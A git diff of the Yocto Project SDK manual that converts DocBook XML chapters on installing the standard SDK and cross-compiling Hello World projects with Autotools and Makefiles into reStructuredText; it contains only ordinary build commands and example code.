-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-using-the-standard-sdk'>
-    <title>Using the Standard SDK</title>
-
-    <para>
-        This chapter describes the standard SDK and how to install it.
-        Information includes unique installation and setup aspects for the
-        standard SDK.
-        <note>
-            For a side-by-side comparison of main features supported for a
-            standard SDK as compared to an extensible SDK, see the
-            "<link linkend='sdk-manual-intro'>Introduction</link>"
-            section.
-        </note>
-    </para>
-
-    <para>
-        You can use a standard SDK to work on Makefile and Autotools-based
-        projects.
-        See the
-        "<link linkend='sdk-working-projects'>Using the SDK Toolchain Directly</link>"
-        chapter for more information.
-    </para>
-
-    <section id='sdk-standard-sdk-intro'>
-        <title>Why use the Standard SDK and What is in It?</title>
-
-        <para>
-            The Standard SDK provides a cross-development toolchain and
-            libraries tailored to the contents of a specific image.
-            You would use the Standard SDK if you want a more traditional
-            toolchain experience as compared to the extensible SDK, which
-            provides an internal build system and the
-            <filename>devtool</filename> functionality.
-        </para>
-
-        <para>
-            The installed Standard SDK consists of several files and
-            directories.
-            Basically, it contains an SDK environment setup script, some
-            configuration files, and host and target root filesystems to
-            support usage.
-            You can see the directory structure in the
-            "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
-            section.
-        </para>
-    </section>
-
-    <section id='sdk-installing-the-sdk'>
-        <title>Installing the SDK</title>
-
-        <para>
-            The first thing you need to do is install the SDK on your
-            <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>Build Host</ulink>
-            by running the <filename>*.sh</filename> installation script.
-        </para>
-
-        <para>
-            You can download a tarball installer, which includes the
-            pre-built toolchain, the <filename>runqemu</filename>
-            script, and support files from the appropriate
-            <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'>toolchain</ulink>
-            directory within the Index of Releases.
-            Toolchains are available for several 32-bit and 64-bit
-            architectures with the <filename>x86_64</filename> directories,
-            respectively.
-            The toolchains the Yocto Project provides are based off the
-            <filename>core-image-sato</filename> and
-            <filename>core-image-minimal</filename> images and contain
-            libraries appropriate for developing against that image.
-        </para>
-
-        <para>
-            The names of the tarball installer scripts are such that a
-            string representing the host system appears first in the
-            filename and then is immediately followed by a string
-            representing the target architecture.
-            <literallayout class='monospaced'>
-     poky-glibc-<replaceable>host_system</replaceable>-<replaceable>image_type</replaceable>-<replaceable>arch</replaceable>-toolchain-<replaceable>release_version</replaceable>.sh
-
-     Where:
-         <replaceable>host_system</replaceable> is a string representing your development system:
-
-                    i686 or x86_64.
-
-         <replaceable>image_type</replaceable> is the image for which the SDK was built:
-
-                    core-image-minimal or core-image-sato.
-
-         <replaceable>arch</replaceable> is a string representing the tuned target architecture:
-
-                    aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon.
-
-         <replaceable>release_version</replaceable> is a string representing the release number of the Yocto Project:
-
-                    &DISTRO;, &DISTRO;+snapshot
-            </literallayout>
-            For example, the following SDK installer is for a 64-bit
-            development host system and a i586-tuned target architecture
-            based off the SDK for <filename>core-image-sato</filename> and
-            using the current &DISTRO; snapshot:
-            <literallayout class='monospaced'>
-     poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
-            </literallayout>
-            <note>
-                As an alternative to downloading an SDK, you can build the
-                SDK installer.
-                For information on building the installer, see the
-                "<link linkend='sdk-building-an-sdk-installer'>Building an SDK Installer</link>"
-                section.
-            </note>
-        </para>
-
-        <para>
-            The SDK and toolchains are self-contained and by default are
-            installed into the <filename>poky_sdk</filename> folder in your
-            home directory.
-            You can choose to install the extensible SDK in any location when
-            you run the installer.
-            However, because files need to be written under that directory
-            during the normal course of operation, the location you choose
-            for installation must be writable for whichever
-            users need to use the SDK.
-        </para>
-
-        <para>
-            The following command shows how to run the installer given a
-            toolchain tarball for a 64-bit x86 development host system and
-            a 64-bit x86 target architecture.
-            The example assumes the SDK installer is located in
-            <filename>~/Downloads/</filename> and has execution rights.
-            <note>
-                If you do not have write permissions for the directory
-                into which you are installing the SDK, the installer
-                notifies you and exits.
-                For that case, set up the proper permissions in the directory
-                and run the installer again.
-            </note>
-            <literallayout class='monospaced'>
-     $ ./Downloads/poky-glibc-x86_64-core-image-sato-i586-toolchain-&DISTRO;.sh
-     Poky (Yocto Project Reference Distro) SDK installer version &DISTRO;
-     ===============================================================
-     Enter target directory for SDK (default: /opt/poky/&DISTRO;):
-     You are about to install the SDK to "/opt/poky/&DISTRO;". Proceed [Y/n]? Y
-     Extracting SDK........................................ ..............................done
-     Setting it up...done
-     SDK has been successfully set up and is ready to be used.
-     Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
-      $ . /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
-            </literallayout>
-        </para>
-
-        <para>
-            Again, reference the
-            "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
-            section for more details on the resulting directory structure of
-            the installed SDK.
-        </para>
-    </section>
-
-    <section id='sdk-running-the-sdk-environment-setup-script'>
-        <title>Running the SDK Environment Setup Script</title>
-
-        <para>
-            Once you have the SDK installed, you must run the SDK environment
-            setup script before you can actually use the SDK.
-            This setup script resides in the directory you chose when you
-            installed the SDK, which is either the default
-            <filename>/opt/poky/&DISTRO;</filename> directory or the directory
-            you chose during installation.
-        </para>
-
-        <para>
-            Before running the script, be sure it is the one that matches the
-            architecture for which you are developing.
-            Environment setup scripts begin with the string
-            "<filename>environment-setup</filename>" and include as part of
-            their name the tuned target architecture.
-            As an example, the following commands set the working directory
-            to where the SDK was installed and then source the environment
-            setup script.
-            In this example, the setup script is for an IA-based
-            target machine using i586 tuning:
-            <literallayout class='monospaced'>
-     $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
-            </literallayout>
-            When you run the setup script, the same environment variables are
-            defined as are when you run the setup script for an extensible SDK.
-            See the
-            "<link linkend='sdk-running-the-extensible-sdk-environment-setup-script'>Running the Extensible SDK Environment Setup Script</link>"
-            section for more information.
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-working-projects.rst b/documentation/sdk-manual/sdk-working-projects.rst
new file mode 100644
index 0000000000..5c828fd586
--- /dev/null
+++ b/documentation/sdk-manual/sdk-working-projects.rst
@@ -0,0 +1,423 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+********************************
+Using the SDK Toolchain Directly
+********************************
+
+You can use the SDK toolchain directly with Makefile and Autotools-based
+projects.
+
+Autotools-Based Projects
+========================
+
+Once you have a suitable :ref:`sdk-manual/sdk-intro:the cross-development toolchain`
+installed, it is very easy to develop a project using the `GNU
+Autotools-based <https://en.wikipedia.org/wiki/GNU_Build_System>`__
+workflow, which is outside of the :term:`OpenEmbedded Build System`.
+
+The following figure presents a simple Autotools workflow.
+
+.. image:: figures/sdk-autotools-flow.png
+   :align: center
+
+Follow these steps to create a simple Autotools-based "Hello World"
+project:
+
+.. note::
+
+   For more information on the GNU Autotools workflow, see the same
+   example on the
+   GNOME Developer
+   site.
+
+1. *Create a Working Directory and Populate It:* Create a clean
+   directory for your project and then make that directory your working
+   location.
+   ::
+
+      $ mkdir $HOME/helloworld
+      $ cd $HOME/helloworld
+
+   After setting up the directory, populate it with files needed for the flow.
+   You need a project source file, a file to help with configuration,
+   and a file to help create the Makefile, and a README file:
+   ``hello.c``, ``configure.ac``, ``Makefile.am``, and ``README``,
+   respectively.
+
+   Use the following command to create an empty README file, which is
+   required by GNU Coding Standards:
+   ::
+
+      $ touch README
+
+   Create the remaining
+   three files as follows:
+
+   -  ``hello.c``:
+      ::
+
+         #include <stdio.h>
+
+         main()
+             {
+                 printf("Hello World!\n");
+             }
+
+   -  ``configure.ac``:
+      ::
+
+         AC_INIT(hello,0.1)
+         AM_INIT_AUTOMAKE([foreign])
+         AC_PROG_CC
+         AC_CONFIG_FILES(Makefile)
+         AC_OUTPUT
+
+   -  ``Makefile.am``:
+      ::
+
+         bin_PROGRAMS = hello
+         hello_SOURCES = hello.c
+
+2. *Source the Cross-Toolchain Environment Setup File:* As described
+   earlier in the manual, installing the cross-toolchain creates a
+   cross-toolchain environment setup script in the directory that the
+   SDK was installed. Before you can use the tools to develop your
+   project, you must source this setup script. The script begins with
+   the string "environment-setup" and contains the machine architecture,
+   which is followed by the string "poky-linux". For this example, the
+   command sources a script from the default SDK installation directory
+   that uses the 32-bit Intel x86 Architecture and the 3.1.2 Yocto
+   Project release:
+   ::
+
+      $ source /opt/poky/3.1.2/environment-setup-i586-poky-linux
+
+3. *Create the configure Script:* Use the ``autoreconf`` command to
+   generate the ``configure`` script.
+   ::
+
+      $ autoreconf
+
+   The ``autoreconf``
+   tool takes care of running the other Autotools such as ``aclocal``,
+   ``autoconf``, and ``automake``.
+
+   .. note::
+
+      If you get errors from
+      configure.ac
+      , which
+      autoreconf
+      runs, that indicate missing files, you can use the "-i" option,
+      which ensures missing auxiliary files are copied to the build
+      host.
+
+4. *Cross-Compile the Project:* This command compiles the project using
+   the cross-compiler. The
+   :term:`CONFIGURE_FLAGS`
+   environment variable provides the minimal arguments for GNU
+   configure:
+   ::
+
+      $ ./configure ${CONFIGURE_FLAGS}
+
+   For an Autotools-based
+   project, you can use the cross-toolchain by just passing the
+   appropriate host option to ``configure.sh``. The host option you use
+   is derived from the name of the environment setup script found in the
+   directory in which you installed the cross-toolchain. For example,
+   the host option for an ARM-based target that uses the GNU EABI is
+   ``armv5te-poky-linux-gnueabi``. You will notice that the name of the
+   script is ``environment-setup-armv5te-poky-linux-gnueabi``. Thus, the
+   following command works to update your project and rebuild it using
+   the appropriate cross-toolchain tools:
+   ::
+
+     $ ./configure --host=armv5te-poky-linux-gnueabi --with-libtool-sysroot=sysroot_dir
+
+5. *Make and Install the Project:* These two commands generate and
+   install the project into the destination directory:
+   ::
+
+      $ make
+      $ make install DESTDIR=./tmp
+
+   .. note::
+
+      To learn about environment variables established when you run the
+      cross-toolchain environment setup script and how they are used or
+      overridden when the Makefile, see the "
+      Makefile-Based Projects
+      " section.
+
+   This next command is a simple way to verify the installation of your
+   project. Running the command prints the architecture on which the
+   binary file can run. This architecture should be the same
+   architecture that the installed cross-toolchain supports.
+   ::
+
+      $ file ./tmp/usr/local/bin/hello
+
+6. *Execute Your Project:* To execute the project, you would need to run
+   it on your target hardware. If your target hardware happens to be
+   your build host, you could run the project as follows:
+   ::
+
+      $ ./tmp/usr/local/bin/hello
+
+   As expected, the project displays the "Hello World!" message.
+
+Makefile-Based Projects
+=======================
+
+Simple Makefile-based projects use and interact with the cross-toolchain
+environment variables established when you run the cross-toolchain
+environment setup script. The environment variables are subject to
+general ``make`` rules.
+
+This section presents a simple Makefile development flow and provides an
+example that lets you see how you can use cross-toolchain environment
+variables and Makefile variables during development.
+
+.. image:: figures/sdk-makefile-flow.png
+   :align: center
+
+The main point of this section is to explain the following three cases
+regarding variable behavior:
+
+-  *Case 1 - No Variables Set in the Makefile Map to Equivalent
+   Environment Variables Set in the SDK Setup Script:* Because matching
+   variables are not specifically set in the ``Makefile``, the variables
+   retain their values based on the environment setup script.
+
+-  *Case 2 - Variables Are Set in the Makefile that Map to Equivalent
+   Environment Variables from the SDK Setup Script:* Specifically
+   setting matching variables in the ``Makefile`` during the build
+   results in the environment settings of the variables being
+   overwritten. In this case, the variables you set in the ``Makefile``
+   are used.
+
+-  *Case 3 - Variables Are Set Using the Command Line that Map to
+   Equivalent Environment Variables from the SDK Setup Script:*
+   Executing the ``Makefile`` from the command line results in the
+   environment variables being overwritten. In this case, the
+   command-line content is used.
+
+.. note::
+
+   Regardless of how you set your variables, if you use the "-e" option
+   with
+   make
+   , the variables from the SDK setup script take precedence:
+   ::
+
+      $ make -e target
+
+
+The remainder of this section presents a simple Makefile example that
+demonstrates these variable behaviors.
+
+In a new shell environment variables are not established for the SDK
+until you run the setup script. For example, the following commands show
+a null value for the compiler variable (i.e.
+:term:`CC`).
+::
+
+   $ echo ${CC}
+
+   $
+
+Running the
+SDK setup script for a 64-bit build host and an i586-tuned target
+architecture for a ``core-image-sato`` image using the current 3.1.2
+Yocto Project release and then echoing that variable shows the value
+established through the script:
+::
+
+   $ source /opt/poky/3.1.2/environment-setup-i586-poky-linux
+   $ echo ${CC}
+   i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/3.1.2/sysroots/i586-poky-linux
+
+To illustrate variable use, work through this simple "Hello World!"
+example:
+
+1. *Create a Working Directory and Populate It:* Create a clean
+   directory for your project and then make that directory your working
+   location.
+   ::
+
+      $ mkdir $HOME/helloworld
+      $ cd $HOME/helloworld
+
+   After
+   setting up the directory, populate it with files needed for the flow.
+   You need a ``main.c`` file from which you call your function, a
+   ``module.h`` file to contain headers, and a ``module.c`` that defines
+   your function.
+
+   Create the three files as follows:
+
+   -  ``main.c``:
+      ::
+
+         #include "module.h"
+         void sample_func();
+         int main()
+         {
+             sample_func();
+             return 0;
+         }
+
+   -  ``module.h``:
+      ::
+
+         #include <stdio.h>
+         void sample_func();
+
+   -  ``module.c``:
+      ::
+
+         #include "module.h"
+         void sample_func()
+         {
+             printf("Hello World!");
+             printf("\n");
+         }
+
+2. *Source the Cross-Toolchain Environment Setup File:* As described
+   earlier in the manual, installing the cross-toolchain creates a
+   cross-toolchain environment setup script in the directory that the
+   SDK was installed. Before you can use the tools to develop your
+   project, you must source this setup script. The script begins with
+   the string "environment-setup" and contains the machine architecture,
+   which is followed by the string "poky-linux". For this example, the
+   command sources a script from the default SDK installation directory
+   that uses the 32-bit Intel x86 Architecture and the DISTRO_NAME Yocto
+   Project release:
+   ::
+
+      $ source /opt/poky/DISTRO/environment-setup-i586-poky-linux
+
+3. *Create the Makefile:* For this example, the Makefile contains
+   two lines that can be used to set the ``CC`` variable. One line is
+   identical to the value that is set when you run the SDK environment
+   setup script, and the other line sets ``CC`` to "gcc", the default
+   GNU compiler on the build host:
+   ::
+
+      # CC=i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux
+      # CC="gcc"
+      all: main.o module.o
+      	${CC} main.o module.o -o target_bin
+      main.o: main.c module.h
+      	${CC} -I . -c main.c
+      module.o: module.c
+      	module.h ${CC} -I . -c module.c
+      clean:
+      	rm -rf *.o
+      	rm target_bin
+
+4. *Make the Project:* Use the ``make`` command to create the binary
+   output file. Because variables are commented out in the Makefile, the
+   value used for ``CC`` is the value set when the SDK environment setup
+   file was run:
+   ::
+
+      $ make
+      i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
+      i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
+      i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
+
+   From the results of the previous command, you can see that
+   the compiler used was the compiler established through the ``CC``
+   variable defined in the setup script.
+
+   You can override the ``CC`` environment variable with the same
+   variable as set from the Makefile by uncommenting the line in the
+   Makefile and running ``make`` again.
+   ::
+
+      $ make clean
+      rm -rf *.o
+      rm target_bin
+      #
+      # Edit the Makefile by uncommenting the line that sets CC to "gcc"
+      #
+      $ make
+      gcc -I . -c main.c
+      gcc -I . -c module.c
+      gcc main.o module.o -o target_bin
+
+   As shown in the previous example, the
+   cross-toolchain compiler is not used. Rather, the default compiler is
+   used.
+
+   This next case shows how to override a variable by providing the
+   variable as part of the command line. Go into the Makefile and
+   re-insert the comment character so that running ``make`` uses the
+   established SDK compiler. However, when you run ``make``, use a
+   command-line argument to set ``CC`` to "gcc":
+   ::
+
+      $ make clean
+      rm -rf *.o
+      rm target_bin
+      #
+      # Edit the Makefile to comment out the line setting CC to "gcc"
+      #
+      $ make
+      i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
+      i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
+      i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
+      $ make clean
+      rm -rf *.o
+      rm target_bin
+      $ make CC="gcc"
+      gcc -I . -c main.c
+      gcc -I . -c module.c
+      gcc main.o module.o -o target_bin
+
+   In the previous case, the command-line argument overrides the SDK
+   environment variable.
+
+   In this last case, edit Makefile again to use the "gcc" compiler but
+   then use the "-e" option on the ``make`` command line:
+   ::
+
+      $ make clean
+      rm -rf *.o
+      rm target_bin
+      #
+      # Edit the Makefile to use "gcc"
+      #
+      $ make
+      gcc -I . -c main.c
+      gcc -I . -c module.c
+      gcc main.o module.o -o target_bin
+      $ make clean
+      rm -rf *.o
+      rm target_bin
+      $ make -e
+      i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c main.c
+      i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux -I . -c module.c
+      i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux main.o module.o -o target_bin
+
+   In the previous case, the "-e" option forces ``make`` to
+   use the SDK environment variables regardless of the values in the
+   Makefile.
+
+5. *Execute Your Project:* To execute the project (i.e. ``target_bin``),
+   use the following command:
+   ::
+
+      $ ./target_bin
+      Hello World!
+
+   .. note::
+
+      If you used the cross-toolchain compiler to build
+      target_bin
+      and your build host differs in architecture from that of the
+      target machine, you need to run your project on the target device.
+
+   As expected, the project displays the "Hello World!" message.
diff --git a/documentation/sdk-manual/sdk-working-projects.xml b/documentation/sdk-manual/sdk-working-projects.xml
deleted file mode 100644
index 521271d54c..0000000000
--- a/documentation/sdk-manual/sdk-working-projects.xml
+++ /dev/null
@@ -1,510 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='sdk-working-projects'>
-
-    <title>Using the SDK Toolchain Directly</title>
-
-    <para>
-        You can use the SDK toolchain directly with Makefile and
-        Autotools-based projects.
-    </para>
-
-    <section id='autotools-based-projects'>
-        <title>Autotools-Based Projects</title>
-
-        <para>
-            Once you have a suitable
-            <ulink url='&YOCTO_DOCS_REF_URL;#cross-development-toolchain'>cross-development toolchain</ulink>
-            installed, it is very easy to develop a project using the
-            <ulink url='https://en.wikipedia.org/wiki/GNU_Build_System'>GNU Autotools-based</ulink>
-            workflow, which is outside of the
-            <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>.
-        </para>
-
-        <para>
-            The following figure presents a simple Autotools workflow.
-            <imagedata fileref="figures/sdk-autotools-flow.png" width="7in" height="8in" align="center" />
-        </para>
-
-        <para>
-            Follow these steps to create a simple Autotools-based
-            "Hello World" project:
-            <note>
-                For more information on the GNU Autotools workflow,
-                see the same example on the
-                <ulink url='https://developer.gnome.org/anjuta-build-tutorial/stable/create-autotools.html.en'>GNOME Developer</ulink>
-                site.
-            </note>
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Create a Working Directory and Populate It:</emphasis>
-                    Create a clean directory for your project and then make
-                    that directory your working location.
-                    <literallayout class='monospaced'>
-     $ mkdir $HOME/helloworld
-     $ cd $HOME/helloworld
-                    </literallayout>
-                    After setting up the directory, populate it with files
-                    needed for the flow.
-                    You need a project source file, a file to help with
-                    configuration, and a file to help create the Makefile,
-                    and a README file:
-                    <filename>hello.c</filename>,
-                    <filename>configure.ac</filename>,
-                    <filename>Makefile.am</filename>, and
-                    <filename>README</filename>, respectively.</para>
-
-                    <para> Use the following command to create an empty README
-                    file, which is required by GNU Coding Standards:
-                    <literallayout class='monospaced'>
-     $ touch README
-                    </literallayout>
-                    Create the remaining three files as follows:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis><filename>hello.c</filename>:</emphasis>
-                            <literallayout class='monospaced'>
-     #include &lt;stdio.h&gt;
-
-     main()
-        {
-           printf("Hello World!\n");
-        }
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>configure.ac</filename>:</emphasis>
-                            <literallayout class='monospaced'>
-     AC_INIT(hello,0.1)
-     AM_INIT_AUTOMAKE([foreign])
-     AC_PROG_CC
-     AC_CONFIG_FILES(Makefile)
-     AC_OUTPUT
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis><filename>Makefile.am</filename>:</emphasis>
-                            <literallayout class='monospaced'>
-     bin_PROGRAMS = hello
-     hello_SOURCES = hello.c
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Source the Cross-Toolchain
-                    Environment Setup File:</emphasis>
-                    As described earlier in the manual, installing the
-                    cross-toolchain creates a cross-toolchain
-                    environment setup script in the directory that the SDK
-                    was installed.
-                    Before you can use the tools to develop your project,
-                    you must source this setup script.
-                    The script begins with the string "environment-setup"
-                    and contains the machine architecture, which is
-                    followed by the string "poky-linux".
-                    For this example, the command sources a script from the
-                    default SDK installation directory that uses the
-                    32-bit Intel x86 Architecture and the
-                    &DISTRO_NAME; Yocto Project release:
-                    <literallayout class='monospaced'>
-     $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Create the <filename>configure</filename> Script:</emphasis>
-                    Use the <filename>autoreconf</filename> command to
-                    generate the <filename>configure</filename> script.
-                    <literallayout class='monospaced'>
-     $ autoreconf
-                    </literallayout>
-                    The <filename>autoreconf</filename> tool takes care
-                    of running the other Autotools such as
-                    <filename>aclocal</filename>,
-                    <filename>autoconf</filename>, and
-                    <filename>automake</filename>.
-                    <note>
-                        If you get errors from
-                        <filename>configure.ac</filename>, which
-                        <filename>autoreconf</filename> runs, that indicate
-                        missing files, you can use the "-i" option, which
-                        ensures missing auxiliary files are copied to the build
-                        host.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Cross-Compile the Project:</emphasis>
-                    This command compiles the project using the
-                    cross-compiler.
-                    The
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIGURE_FLAGS'><filename>CONFIGURE_FLAGS</filename></ulink>
-                    environment variable provides the minimal arguments for
-                    GNU configure:
-                    <literallayout class='monospaced'>
-     $ ./configure ${CONFIGURE_FLAGS}
-                    </literallayout>
-                    For an Autotools-based project, you can use the
-                    cross-toolchain by just passing the appropriate host
-                    option to <filename>configure.sh</filename>.
-                    The host option you use is derived from the name of the
-                    environment setup script found in the directory in which
-                    you installed the cross-toolchain.
-                    For example, the host option for an ARM-based target that
-                    uses the GNU EABI is
-                    <filename>armv5te-poky-linux-gnueabi</filename>.
-                    You will notice that the name of the script is
-                    <filename>environment-setup-armv5te-poky-linux-gnueabi</filename>.
-                    Thus, the following command works to update your project
-                    and rebuild it using the appropriate cross-toolchain tools:
-                    <literallayout class='monospaced'>
-     $ ./configure --host=armv5te-poky-linux-gnueabi --with-libtool-sysroot=<replaceable>sysroot_dir</replaceable>
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Make and Install the Project:</emphasis>
-                    These two commands generate and install the project
-                    into the destination directory:
-                    <literallayout class='monospaced'>
-     $ make
-     $ make install DESTDIR=./tmp
-                    </literallayout>
-                    <note>
-                        To learn about environment variables established
-                        when you run the cross-toolchain environment setup
-                        script and how they are used or overridden when
-                        the Makefile, see the
-                        "<link linkend='makefile-based-projects'>Makefile-Based Projects</link>"
-                        section.
-                    </note>
-                    This next command is a simple way to verify the
-                    installation of your project.
-                    Running the command prints the architecture on which
-                    the binary file can run.
-                    This architecture should be the same architecture that
-                    the installed cross-toolchain supports.
-                    <literallayout class='monospaced'>
-     $ file ./tmp/usr/local/bin/hello
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Execute Your Project:</emphasis>
-                    To execute the project, you would need to run it on your
-                    target hardware.
-                    If your target hardware happens to be your build host,
-                    you could run the project as follows:
-                    <literallayout class='monospaced'>
-     $ ./tmp/usr/local/bin/hello
-                    </literallayout>
-                    As expected, the project displays the "Hello World!"
-                    message.
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id='makefile-based-projects'>
-        <title>Makefile-Based Projects</title>
-
-        <para>
-            Simple Makefile-based projects use and interact with the
-            cross-toolchain environment variables established when you run
-            the cross-toolchain environment setup script.
-            The environment variables are subject to general
-            <filename>make</filename> rules.
-        </para>
-
-        <para>
-            This section presents a simple Makefile development flow and
-            provides an example that lets you see how you can use
-            cross-toolchain environment variables and Makefile variables
-            during development.
-            <imagedata fileref="figures/sdk-makefile-flow.png" width="6in" height="7in" align="center" />
-        </para>
-
-        <para>
-            The main point of this section is to explain the following three
-            cases regarding variable behavior:
-            <itemizedlist>
-                <listitem><para>
-                    <emphasis>Case 1 - No Variables Set in the
-                    <filename>Makefile</filename> Map to Equivalent
-                    Environment Variables Set in the SDK Setup Script:</emphasis>
-                    Because matching variables are not specifically set in the
-                    <filename>Makefile</filename>, the variables retain their
-                    values based on the environment setup script.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Case 2 - Variables Are Set in the Makefile that
-                    Map to Equivalent Environment Variables from the SDK
-                    Setup Script:</emphasis>
-                    Specifically setting matching variables in the
-                    <filename>Makefile</filename> during the build results in
-                    the environment settings of the variables being
-                    overwritten.
-                    In this case, the variables you set in the
-                    <filename>Makefile</filename> are used.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Case 3 - Variables Are Set Using the Command Line
-                    that Map to Equivalent Environment Variables from the
-                    SDK Setup Script:</emphasis>
-                    Executing the <filename>Makefile</filename> from the
-                    command line results in the environment variables being
-                    overwritten.
-                    In this case, the command-line content is used.
-                    </para></listitem>
-            </itemizedlist>
-            <note>
-                Regardless of how you set your variables, if you use
-                the "-e" option with <filename>make</filename>, the
-                variables from the SDK setup script take precedence:
-                <literallayout class='monospaced'>
-     $ make -e <replaceable>target</replaceable>
-                </literallayout>
-            </note>
-        </para>
-
-        <para>
-            The remainder of this section presents a simple Makefile example
-            that demonstrates these variable behaviors.
-        </para>
-
-        <para>
-            In a new shell environment variables are not established for the
-            SDK until you run the setup script.
-            For example, the following commands show a null value for the
-            compiler variable (i.e.
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-CC'><filename>CC</filename></ulink>).
-            <literallayout class='monospaced'>
-     $ echo ${CC}
-
-     $
-            </literallayout>
-            Running the SDK setup script for a 64-bit build host and an
-            i586-tuned target architecture for a
-            <filename>core-image-sato</filename> image using the current
-            &DISTRO; Yocto Project release and then echoing that variable
-            shows the value established through the script:
-            <literallayout class='monospaced'>
-     $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
-     $ echo ${CC}
-     i586-poky-linux-gcc -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux
-            </literallayout>
-        </para>
-
-        <para>
-            To illustrate variable use, work through this simple "Hello World!"
-            example:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Create a Working Directory and Populate It:</emphasis>
-                    Create a clean directory for your project and then make
-                    that directory your working location.
-                    <literallayout class='monospaced'>
-     $ mkdir $HOME/helloworld
-     $ cd $HOME/helloworld
-                    </literallayout>
-                    After setting up the directory, populate it with files
-                    needed for the flow.
-                    You need a <filename>main.c</filename> file from which you
-                    call your function, a <filename>module.h</filename> file
-                    to contain headers, and a <filename>module.c</filename>
-                    that defines your function.
-                    </para>
-
-                    <para>Create the three files as follows:
-                        <itemizedlist>
-                            <listitem><para>
-                                <emphasis><filename>main.c</filename>:</emphasis>
-                                <literallayout class='monospaced'>
-     #include "module.h"
-     void sample_func();
-     int main()
-     {
-     	sample_func();
-     	return 0;
-     }
-                                </literallayout>
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis><filename>module.h</filename>:</emphasis>
-                                <literallayout class='monospaced'>
-     #include &lt;stdio.h&gt;
-     void sample_func();
-                                </literallayout>
-                                </para></listitem>
-                            <listitem><para>
-                                <emphasis><filename>module.c</filename>:</emphasis>
-                                <literallayout class='monospaced'>
-     #include "module.h"
-     void sample_func()
-     {
-	     printf("Hello World!");
-	     printf("\n");
-     }
-                                </literallayout>
-                                </para></listitem>
-                        </itemizedlist>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Source the Cross-Toolchain Environment Setup File:</emphasis>
-                    As described earlier in the manual, installing the
-                    cross-toolchain creates a cross-toolchain environment setup
-                    script in the directory that the SDK was installed.
-                    Before you can use the tools to develop your project,
-                    you must source this setup script.
-                    The script begins with the string "environment-setup"
-                    and contains the machine architecture, which is
-                    followed by the string "poky-linux".
-                    For this example, the command sources a script from the
-                    default SDK installation directory that uses the
-                    32-bit Intel x86 Architecture and the
-                    &DISTRO_NAME; Yocto Project release:
-                    <literallayout class='monospaced'>
-     $ source /opt/poky/&DISTRO;/environment-setup-i586-poky-linux
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Create the <filename>Makefile</filename>:</emphasis>
-                    For this example, the Makefile contains two lines that
-                    can be used to set the <filename>CC</filename> variable.
-                    One line is identical to the value that is set when you
-                    run the SDK environment setup script, and the other line
-                    sets <filename>CC</filename> to "gcc", the default GNU
-                    compiler on the build host:
-                    <literallayout class='monospaced'>
-     # CC=i586-poky-linux-gcc  -m32 -march=i586 --sysroot=/opt/poky/2.5/sysroots/i586-poky-linux
-     # CC="gcc"
-     all: main.o module.o
